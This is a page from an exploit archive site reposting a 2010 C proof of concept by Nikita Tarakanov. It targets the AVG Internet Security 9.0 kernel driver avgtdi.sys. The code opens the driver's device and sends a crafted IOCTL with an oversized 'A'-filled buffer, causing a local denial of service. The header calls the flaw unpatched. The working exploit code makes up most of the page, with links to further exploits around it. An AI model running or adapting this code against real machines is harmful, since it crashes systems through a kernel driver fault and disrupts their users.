首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AVG Internet Security v9.0.851 Local Denial of Service Exploit
来源:CISS Research Team 作者:Tarakanov 发布时间:2010-11-03  

/*
# Exploit Title: AVG Internet Security 0day Local DoS Exploit
# Date: 2010-11-01
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link: http://www.avg.com
# Version: up to date, version 9.0.851, avgtdix.sys version 9.0.0.832
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <io.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>
#include <share.h>

 

int main(int argc, char **argv)
{
 HANDLE   hDevice;
 DWORD    cb;
 void  *buff;
 int outlen = 0x18, inlen = 0x10;
 DWORD ioctl = 0x830020C8;
 char deviceName[] = "\\\\.\\avgtdi";
 char logName[] = "avgtdi.log";

 if ( (hDevice = CreateFileA(deviceName,
        GENERIC_READ|GENERIC_WRITE,
        0,
        0,
        OPEN_EXISTING,
        0,
        NULL) ) != INVALID_HANDLE_VALUE )
 {
  printf("Device  succesfully opened!\n");
 }
 else
 {
  printf("Error: Error opening device \n");
  return 0;
 }

 cb = 0;
 buff = malloc(0x1000);
 if(!buff){
   printf("malloc failed");
   return 0;
 }
 memset(buff, 'A', 0x1000-1);

 

 DeviceIoControl(hDevice, ioctl, (LPVOID)buff, inlen, (LPVOID)buff, outlen, &cb, NULL);

 free(buff);
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MetInfo 3.0 (fckeditor) Arbitr
·discuz 7.0-7.2 get shell
·Quickzip 5.1.8.1 Denial of Ser
·Yaws 1.89 Directory Traversal
·Maxthon 3.0.18.1000 CSS Denial
·Rising RSNTGDI.sys Local Denia
·Dolphin v7.0.3 Multiple Vulner
·Xerox 4595 Denial of Service V
·Gom Player (wav) Denial of Ser
·Trend Micro Titanium Maximum S
·Minishare 1.5.5 Buffer Overflo
·Sybase Advantage Data Architec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved